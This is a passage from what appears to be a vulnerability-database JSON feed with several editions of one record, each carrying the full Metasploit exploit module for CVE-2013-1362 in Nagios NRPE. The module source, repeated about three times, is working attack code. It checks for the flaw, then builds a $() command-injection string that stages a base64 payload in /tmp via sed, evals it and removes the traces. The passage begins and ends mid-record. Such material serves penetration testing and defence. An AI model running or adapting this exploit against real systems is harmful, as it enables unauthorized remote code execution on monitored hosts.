Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-12T15:33:47", "differentElements": ["modified", "published"], "edition": 84}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-12T19:29:06", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-12T19:29:06", "differentElements": ["modified", "published"], "edition": 85}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-19T09:26:25", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-19T09:26:25", "differentElements": ["modified", "published"], "edition": 86}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "c959c5b4ed9c6c656d3d46477b650b67", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-19T11:26:05", "history": [], "viewCount": 119, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "openvas", "idList": ["OPENVAS:850457", "OPENVAS:865756", "OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310850460", "OPENVAS:850460", "OPENVAS:1361412562310121262"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "nessus", "idList": ["SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "FEDORA_2013-9829.NASL", "NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "FEDORA_2013-9848.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0621-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121287", "PACKETSTORM:120507"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2018-08-19T11:26:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-19T11:26:05", "differentElements": ["sourceData"], "edition": 87}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "221de7eb2a0f009605030c49b30fe87e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-03-14T11:02:27", "history": [], "viewCount": 119, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "nessus", "idList": ["SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "FEDORA_2013-9836.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9848.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310850457", "OPENVAS:850460", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310121262"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-03-14T11:02:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2019-03-14T11:02:27", "differentElements": ["sourceData"], "edition": 88}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "c959c5b4ed9c6c656d3d46477b650b67", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-03-14T12:50:57", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "nessus", "idList": ["NAGIOS_NRPE_2_14.NASL", "FEDORA_2013-9836.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9848.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310865756", "OPENVAS:1361412562310850457", "OPENVAS:850460", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "saint", "idList": 